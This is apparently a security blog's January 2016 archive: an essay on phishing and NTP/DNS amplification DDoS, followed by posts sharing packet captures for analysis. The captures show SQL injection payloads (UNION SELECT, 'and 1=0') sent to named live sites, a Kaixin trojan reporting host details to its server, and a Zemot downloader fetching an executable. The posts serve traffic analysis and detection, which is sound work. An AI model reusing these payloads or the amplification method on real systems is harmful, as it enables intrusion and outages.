Monthly Archives: January 2016

Cyber Security Trends in 2016 – Denial of Service and Webshells on the rise

According to several security research firms 2015 saw a massive decline in the number of reported malware infections, a decline in exploit activity of 84% compared to that of 2013. The few active exploit kits worth noting were Angler, Neutrino and Rig but besides those three there were virtually no other major campaigns detected in 2015. In previous years, such as 2013 there were detentions of over 30+ different exploit kits owned and operated by their own cyber crimeware actor groups. The number of new malware families and variants also dropped by over 50%. DDoS attacks rose by 30% and SQLi and XSS also rose around 10% over the previous year.

2016 has continued the same trends we saw for 2015, an even smaller number of exploit campaigns have been detected. The primary vector crimeware families are implementing is spam and spear phishing attacks. The spam e-mails and phishing campaigns are not like the ones we saw in years past, it appears the hostile actors have learned how to use spell checker and the content of these e-mails are closer to home for most would be victims. Spammers are learning how to relate to those they want to infect by choosing e-mail subjects and content related to things a majority of internet users would be interested in clicking. Examples, focusing on shipping around Christmas and holidays with topics such as click here for tracking of your package or download your purchase receipt in .Doc format or .xls which average internet users would think are completely harmless when in fact if you have not disabled macros in Microsoft Word/Excel, opening a malicious attachment will result in the macro being activated which will download a malicious executable from the hackers infrastructure or most likely a hacked webserver from SQLi/XSS vulnerabilities. Spammers are focusing on PayPal account issues, eBay account problems and now that it is coming up on tax season expect to see fake IRS and TurboTax e-mails or bank focused campaigns to download your W4 for taxes.

The biggest threat to enterprise security is social engineering, when your organization does vulnerability assessments and penetration testing make sure they focus on exploiting your employees and clients desire to trust in others. Your patch management and configuration management can be top notch but if the people you employ and do business with are susceptible to social engineering attacks your still at risk for compromise. Mitigating the risk of social engineering is not a simple task, human beings by nature are trustworthy and may click links and follow tasks without cognitively processing what they are doing. There is also the issue of intelligence, unfortunately some of your employees are just not going to be intelligent enough to see through the facade that an attacker is creating. Put up posters, have mandatory awareness seminars and meetings.

The next threat that is on the rise is denial of service (DoS) but more specifically Distributed reflected Denial of Service attacks. These attacks are easy to conduct, an attacker doesn’t even have to compromise hosts and servers to build a botnet anymore, they simply take advantage of services that openly reply to UDP requests from outside your network. The most common services that are susceptible and leveraged by attackers are NTP, SSDP, DNS, SNMP, Chargen and peer-to-peer file transfers. NTP offers the highest “amplification factor” up to 500 to 1, an attacker spoofs the IP of the target they wish to attack and request the monlist from a vulnerable NTP server and this request is say 5 bytes, when the NTP server responds to the request and delivers the monlist results to the spoofed IP target. An attacker simply needs to scan the internet for port 123 and make a request and log any servers that respond. The NTP servers that respond get put into a list and become leveraged in attacks.

As of February 2016 and an analysis of 400 of the latest NTP attacks reported we have grepped the logs and found that there are at least a minimum of 16,740 vulnerable NTP servers in the world. This number is significantly lower than the beginning of 2015 which we counted 54,300 vulnerable NTP servers. Never the less, a few thousand vulnerable servers is enough to take down most targets. In 2015 there were 4.9 million hosts vulnerable to SSDP amplification attacks, that number has dropped to 1.6 million, while that number is still staggering and capable of generating 100MB/sec attacks, the amplification factor is far lower for SSDP than NTP.

DNS however is on the rise, there are many ways an attacker can leverage vulnerabilities in the protocol to create amplification attacks, DNS Flooder is a tool that is commonly used to launch such attacks. DNS amplification attacks are on the rise, a 25% increase from 2015. Attackers create domain names with massive TXT records which when queried return large responses to the victim. Domain servers that respond to request for “.” are a huge concern as they will return all results to the victim, attackers combine many different vulnerabilities in the DNS system and put them together to amplify attacks at enormous rates. In 2016 an attack was observed delivering over 500gigabytes/second which leveraged all forms of DrDoS protocol weaknesses. DNS Amplification attacks with huge TXT record domain names is currently the largest risk we are facing from attackers and it works like this:

 

dns

 

A video depicting the attack process:

 

Share Button

Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

Download Active Business DIrectory Remote Blind SQL Injection PCAP : remoteblindsql.pcap

 

 

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 1:1421, ack 438, win 65098, length 1420: HTTP: HTTP/1.1 500 Internal Server Error
.. v…!E…JZ@.q.cm.j..u….P .f).tJ…P..J….HTTP/1.1 500 Internal Server Error
Date: Thu, 01 Jan 2009 14:36:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 4951
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD; path=/
Cache-control: private

Active Business Directory

 

208.106.128.136.80: Flags [.], ack 2841, win 65535, length 0 .. v.*.!E..(Wm@…L.u….j.. ..PJ…f*..P……. 2009-01-01 09:37:00.315557 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], ack 438, win 65098, length 0 .. v.,.!E..(K @.q.hI.j..u….P .f*..J…P..J…… 2009-01-01 09:37:00.960486 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 2841:4261, ack 438, win 65098, length 1420: HTTP .. v…!E…Ol@.q.^[.j..u….P .f*..J…P..Jk#..>

 

Tell a Friend
Make This Your Home Page
Book Mark

 

Page Views Visitors
Today 45 45
Jan 45 45
Total 34,232 32,098

 

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ‘Links.CategoryID=categories.CategoryID and Approved<>0 and Links.CategoryID in ()’.

/demoactivebusinessdirectory/includes/gentable.asp, line 40
2009-01-01 09:37:00.963903 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [.], ack 5250, win 65535, length 0
.. v.*.!E..(W.@…L.u….j.. ..PJ…f*..P….i..
2009-01-01 09:37:00.984661 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 438:967, ack 5250, win 65535, length 529: HTTP: GET /demoactivebusinessdirectory/style.css HTTP/1.1
.. v.;.!E..9W.@…J.u….j.. ..PJ…f*..P…….GET /demoactivebusinessdirectory/style.css HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/css,*/*;q=0.1
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.activewebsoftwares.com/demoactivebusinessdirectory/default.asp?catid=0+and+1=0
Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD

2009-01-01 09:37:01.748226 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], seq 5250:6670, ack 967, win 64569, length 1420: HTTP: HTTP/1.1 200 OK
.. v…!E…T.@.q.Y..j..u….P .f*..J…P..9….HTTP/1.1 200 OK
Content-Length: 4545
Content-Type: text/css
Last-Modified: Mon, 29 Jan 2007 15:53:53 GMT
Accept-Ranges: bytes
ETag: “80bec7acbd43c71:b1b”
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 01 Jan 2009 14:36:59 GMT
2009-01-01 09:37:01.754823 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [.], ack 10079, win 65535, length 0
.. v.*.!E..(W.@…LWu….j.. ..PJ…f*!.P….{..
2009-01-01 09:37:01.767340 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 967:1505, ack 10079, win 65535, length 538: HTTP: GET /demoactivebusinessdirectory/images/background.gif HTTP/1.1
.. v.D.!E..BX.@…J.u….j.. ..PJ…f*!.P….E..GET /demoactivebusinessdirectory/images/background.gif HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.activewebsoftwares.com/demoactivebusinessdirectory/style.css
Cookie: ASPSESSIONIDAATCCABQ=LBJJBJACJJELOIFHAJBGEMAD

2009-01-01 09:37:01.929693 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [.], ack 967, win 64569, length 0
.. v.,.!E..(Ww@.q.[..j..u….P .f*!.J…P..9.A….
2009-01-01 09:37:02.523785 PPPoE [ses 0x976] IP 208.106.128.136.80 > 117.195.143.198.2308: Flags [P.], seq 10079:10452, ack 1505, win 65535, length 373: HTTP: HTTP/1.1 200 OK
.. v…!E…\’@.q.U..j..u….P .f*!.J…P…5H..HTTP/1.1 200 OK
Content-Length: 90
Content-Type: image/gif
Last-Modified: Mon, 29 Jan 2007 15:53:53 GMT
Accept-Ranges: bytes
ETag: “80bec7acbd43c71:b1b”
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 01 Jan 2009 14:36:59 GMT

GIF89a ………….Hq9~.,…. …..3…&…………..H………..B..=…….
…….n..;
2009-01-01 09:37:02.706130 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [.], ack 10452, win 65162, length 0

Share Button

Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

Download Capsule Sticker SQL Injection PCAP : stickersqli

2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
.. v.].!E..[..@…..u……..S.P.r,e….P…N’..GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
Host: www.musicza.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: st1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*=1531fbf68f1f62ccb7b88e9ed77ce518; st1=1531fbf68f1f62ccb7b88e9ed77ce518; st=1531fbf68f1f62ccb7b88e9ed77ce518; PHPSESSID=c1f052c9ac5e264c7b3e29354a9c25cf; _cbclose=1; _cbclose41266=1; _uid41266=7981BF9C.1; _ctout41266=1; verify=test; testcookie=enabled; visit_time=23

2009-01-01 09:30:20.575264 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], ack 820, win 7371, length 0
.. v.,.!E..(..@.4…….u….P.S…..r/.P…(…..
2009-01-01 09:30:20.593702 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], seq 1421:2841, ack 820, win 7371, length 1420: HTTP
.. v…!E…..@.4…….u….P.S…e.r/.P…_…ction MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
function setsmile(what)
{
document.Postcomment.CommentText.value = document.Postcomment.elements.CommentText.value+” “+what;
document.Postcomment.CommentText.focus();
}
function PopupPic(sPicURL) {
window.open( “popup.html?”+sPicURL, “”,
“resizable=1,HEIGHT=200,WIDTH=200”);
}
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//–>

 

 

 
2009-01-01 09:30:20.595004 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [.], ack 1, win 65535, options [nop,nop,sack 1 {1421:2841}], length 0
.. v.6.!E..4..@…..u……..S.P.r/…………….
2009-01-01 09:30:20.595759 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], seq 1:1421, ack 820, win 7371, length 1420: HTTP: HTTP/1.1 200 OK
.. v…!E…..@.4…….u….P.S…..r/.P…….HTTP/1.1 200 OK
Date: Thu, 01 Jan 2009 13:59:20 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: st1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*=1531fbf68f1f62ccb7b88e9ed77ce518; expires=Thu, 01-Jan-2009 14:59:20 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=TIS-620214b

Musicza Sticker Extreme edition

Share Button

Kaixin Malware Trojan Traffic Analysis Download PCAP Sample

Download Kaixin PCAP Sample : kaixin.pcap

 

2015-01-02 19:50:37.708348 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [S], seq 75942973, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@………w……P…=….p…f………..
2015-01-02 19:50:37.882144 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [S.], seq 954914802, ack 75942974, win 16384, options [mss 1260,nop,nop,sackOK], length 0
E..0X\..o…w……..P..8……>p.@..y……….
2015-01-02 19:50:37.882622 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [.], ack 1, win 64240, length 0
E..(..@………w……P…>8…P……..c…W
2015-01-02 19:50:37.883125 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [P.], seq 1:459, ack 1, win 64240, length 458: HTTP: POST /tj.asp HTTP/1.1
E…..@………w……P…>8…P…U…POST /tj.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.568bar.com/tj.asp
Accept-Language: zh-cn
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.568bar.com
Cache-Control: no-cache

yz=1314&uz=1&jc=
2015-01-02 19:50:38.059030 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [P.], seq 1:624, ack 459, win 65077, length 623: HTTP: HTTP/1.1 200 OK
E…X.@.o.d.w……..P..8…….P..5….HTTP/1.1 200 OK
Date: Sat, 03 Jan 2015 00:51:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 380
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAASBDBQB=BBDKMCDDPEKECFACGNLLOAFO; path=/
Cache-control: private

dnf.exe|lolclient.exe|crossfire.exe|soul.exe|asktao.mod|wow.exe|wow-64.exe|jfzr.exe|launcher.exe|asura.exe|elementclient.exe|qqhxsj.exe|cstrike-online.exe|game.exe|aion.bin|dungeonstriker.exe|zhengtu2.dat|qqsg.exe|gameplaza.exe|gtsaloon.exe|fifazf.exe|dragonnest.exe|dj2.exe|jx3client.exe|tty3d.exe|xxzshell.exe|qqhxgame.exe|tklobby.exe|<br>http://www.sina.com|http://www.sina.com
2015-01-02 19:50:38.059634 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [R.], seq 459, ack 624, win 0, length 0
E..(..@………w……P….8..bP…y8….3.=)
2015-01-02 19:50:38.393027 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [S], seq 1143477102, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….3….w……PD(.n….p….?……….
2015-01-02 19:50:38.578643 IP 119.147.137.27.80 > 192.168.138.158.1043: Flags [S.], seq 3474551616, ack 1143477103, win 16384, options [mss 1260,nop,nop,sackOK], length 0
E..0X…0..Fw……..P….s@D(.op.@.Y………..
2015-01-02 19:50:38.579027 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [.], ack 1, win 64240, length 0
E..(..@….6….w……PD(.o..sAP…….e….I
2015-01-02 19:50:38.579445 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [P.], seq 1:555, ack 1, win 64240, length 554: HTTP: GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack HTTP/1.1
E..R..@………w……PD(.o..sAP…Fu..GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.92liu.com/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.92liu.com
Cache-Control: no-cache
2015-01-02 19:50:38.846793 IP 119.147.137.27.80 > 192.168.138.158.1043: Flags [P.], seq 1:263, ack 555, win 64981, length 262: HTTP: HTTP/1.1 200 OK
E…X.@.0…w……..P….sAD(..P…B…HTTP/1.1 200 OK
Date: Sat, 03 Jan 2015 00:51:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 20
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCAATQTR=NDGIGFGDAIGABFJBDDJBNDCJ; path=/
Cache-control: private

upData Update OK<br>
2015-01-02 19:50:38.847467 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [R.], seq 555, ack 263, win 0, length 0
E..(..@….4….w……PD(….tGP….U…….I

Share Button

Zemot/Harbinger Rootkit Trojan Downloader Loads Kuluoz/Asprox Malware PCAP Traffic Sample

Download Zemot/Harbinger Kuluoz Trojan Downloader PCAP : zemot.pcap

E..(..@….A…..wi..t.P…… .P….=……..
2014-08-15 09:11:05.358087 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [P.], seq 1:294, ack 1, win 64240, length 293: HTTP: GET /b/shoe/749634 HTTP/1.1
E..M..@……….wi..t.P…… .P…….GET /b/shoe/749634 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: raing-gerut.su
Cache-Control: no-cache
2014-08-15 09:11:05.358095 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [.], ack 294, win 64240, length 0
E..(V……b.wi……P.t.. …..P………….
2014-08-15 09:11:05.694537 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [P.], seq 1:149, ack 294, win 64240, length 148: HTTP: HTTP/1.1 200 OK
E…Y……B.wi……P.t.. …..P…K*..HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:11:05 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 0
Connection: close
2014-08-15 09:11:05.695797 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [F.], seq 294, ack 149, win 64092, length 0
E..(..@….?…..wi..t.P……!&P..\……….
2014-08-15 09:11:05.695816 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [.], ack 295, win 64239, length 0
E..(Y……..wi……P.t..!&….P………….
2014-08-15 09:11:05.699398 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
E..?……AV………..5.+^.[…………dients-lihuret.su…..
2014-08-15 09:11:05.712765 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [FP.], seq 149, ack 295, win 64239, length 0
E..(Y……..wi……P.t..!&….P….{……..
2014-08-15 09:11:05.712972 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [.], ack 150, win 64092, length 0
E..(..@….=…..wi..t.P……!’P..\……….
2014-08-15 09:11:06.045599 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [P.], seq 274730080:274731447, ack 3301971623, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…\……#.&…….P.s.`.`….P…….HTTP/1.1 200 OK
Date: Fri, 15 Aug 2014 14:11:04 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 90112
Connection: close
Content-Type: text/html

kx..!…”……………^…………………………………,=.,..’.?..j.?r…>…….>……>..>…>..>bmq>….L++(B……..i…H&..H&..H&.>Cs..H&..S9..H&.~T$..H&..S ..H&..S*..H&..*!..H&..**..H&..H’.v.&.)S!..H&.BJ,..H&.p….H&…………………….nc..j.”.C..q……….-.).$..~……………………^………”…….”……..~………. ………………………………………..v…………………………………………………………………….”………………………L……..v…….w………………>…………4…….3………………^.._L……..b…….g………………^………..w………………………^..b………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….
2014-08-15 09:11:06.046425 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [.], seq 1367:2827, ack 1, win 64240, length 1460: HTTP
E…\……..&…….P.s.`……P….)………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….
2014-08-15 09:11:06.046448 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [P.], seq 2827:4101, ack 1, win 64240, length 1274: HTTP
E..”\……~.&…….P.s.`.k….P…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………

2014-08-15 09:11:06.714346 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
E..?……A…………5.+^.[…………dients-lihuret.su…..
2014-08-15 09:11:07.727996 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
E..? …..A ………..5.+^.[…………dients-lihuret.su…..
2014-08-15 09:11:07.729685 IP 172.16.204.2.53 > 172.16.204.128.51462: 23471 13/0/0 A 178.74.212.207, A 213.111.146.59, A 46.119.141.38, A 76.71.165.162, A 178.74.226.67, A 188.190.5.162, A 109.104.165.244, A 46.98.129.84, A 91.203.89.26, A 134.249.11.2, A 93.78.67.85, A 46.211.40.28, A 66.231.16.101 (243)
E…k……6………5……[…………dients-lihuret.su………………J……………o.;………….w.&…………LG……………J.C……………………….mh……………b.T…………[.Y………………………..]NCU…………..(………….B..e
2014-08-15 09:11:07.730376 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [S], seq 3923929809, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4 .@……….J…v.P..j……. .9……………
2014-08-15 09:11:07.920077 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [S.], seq 493119538, ack 3923929810, win 64240, options [mss 1460], length 0
E..,l……j.J…….P.v.dh2..j.`….h……..
2014-08-15 09:11:07.920132 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [.], ack 1, win 64240, length 0
E..( .@….!…..J…v.P..j..dh3P….%……..
2014-08-15 09:11:07.930887 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [P.], seq 1:317, ack 1, win 64240, length 316: HTTP: GET /mod_articles-login-llget9/jquery/ HTTP/1.1
E..d .@……….J…v.P..j..dh3P…._..GET /mod_articles-login-llget9/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:11:07.930896 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [.], ack 317, win 64240, length 0
E..(l……m.J…….P.v.dh3..l.P………….
2014-08-15 09:11:08.139123 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [P.], seq 1:1368, ack 317, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E…nj…..c.J…….P.v.dh3..l.P…….HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:12:37 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Content-disposition: attachment; filename=exe.exe
Pragma: no-cache

1f68
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$……..Kf..*…*…*.. %U..*…5…*..`6…*…5…*…5…*…….*…….*…* .X….5…*..$,…*..Rich.*……………………..PE..L…%..S……………..`…@…….h…….p….@………………………………………………………………..~……….X………………………………………………………………….p………………………….texu….X…….Y……………… ..a.rdata…….p…….p…………..@..A.data….D…….I………………@….rsrc…Y………………………@..D………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….

2014-08-15 09:11:12.974845 IP 172.16.204.128.49272 > 178.74.212.207.80: Flags [P.], seq 1:317, ack 1, win 64240, length 316: HTTP: GET /mod_articles-login-llget9/jquery/ HTTP/1.1
E..d S@……….J…x.PW’..%TS.P…AR..GET /mod_articles-login-llget9/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:11:12.974899 IP 178.74.212.207.80 > 172.16.204.128.49272: Flags [.], ack 317, win 64240, length 0
E..(…….t.J…….P.x%TS.W’..P…:………
2014-08-15 09:11:13.209681 IP 178.74.212.207.80 > 172.16.204.128.49272: Flags [P.], seq 1:1368, ack 317, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
E….c…..j.J…….P.x%TS.W’..P…….HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:12:42 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Content-disposition: attachment; filename=exe.exe
Pragma: no-cache

1f68
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2014-08-15 09:14:03.628461 IP 172.16.204.128.64854 > 172.16.204.2.53: 16404+ A? dients-lihuret.su. (35)
E..?.M….I……….V.5.+F+@…………dients-lihuret.su…..
2014-08-15 09:14:04.624698 IP 172.16.204.128.64854 > 172.16.204.2.53: 16404+ A? dients-lihuret.su. (35)
E..?.R….I……….V.5.+F+@…………dients-lihuret.su…..
2014-08-15 09:14:05.327272 IP 172.16.204.2.53 > 172.16.204.128.64854: 16404 14/0/0 A 37.229.189.208, A 5.105.120.46, A 178.129.149.214, A 94.153.28.86, A 212.76.17.174, A 93.127.66.152, A 31.128.173.205, A 78.56.92.46, A 93.79.151.73, A 176.111.252.50, A 95.215.116.114, A 93.79.30.112, A 109.87.59.249, A 188.143.94.81 (259)
E…E……`………5.V….@…………dients-lihuret.su……………..%…………….ix………………………..^..V………….L…………..].B………………………..N8\………….]O.I………….o.2…………_.tr…………]O.p…………mW;……………^Q
2014-08-15 09:14:05.329188 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [S], seq 357766832, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.S@….*….%……P.S…….. ..q…………..
2014-08-15 09:14:05.442685 IP 172.16.204.2.53 > 172.16.204.128.64854: 16404 14/0/0 A 5.105.120.46, A 178.129.149.214, A 94.153.28.86, A 212.76.17.174, A 93.127.66.152, A 31.128.173.205, A 78.56.92.46, A 93.79.151.73, A 176.111.252.50, A 95.215.116.114, A 93.79.30.112, A 109.87.59.249, A 188.143.94.81, A 37.229.189.208 (259)
E…F…………….5.V….@…………dients-lihuret.su………………ix………………………..^..V………….L…………..].B………………………..N8\………….]O.I………….o.2…………_.tr…………]O.p…………mW;……………^Q…………%…
2014-08-15 09:14:05.664770 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [S.], seq 875893152, ack 357766833, win 64240, options [mss 1460], length 0
E..,HW……%……..P..45…S..`………….
2014-08-15 09:14:05.664958 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [.], ack 1, win 64240, length 0
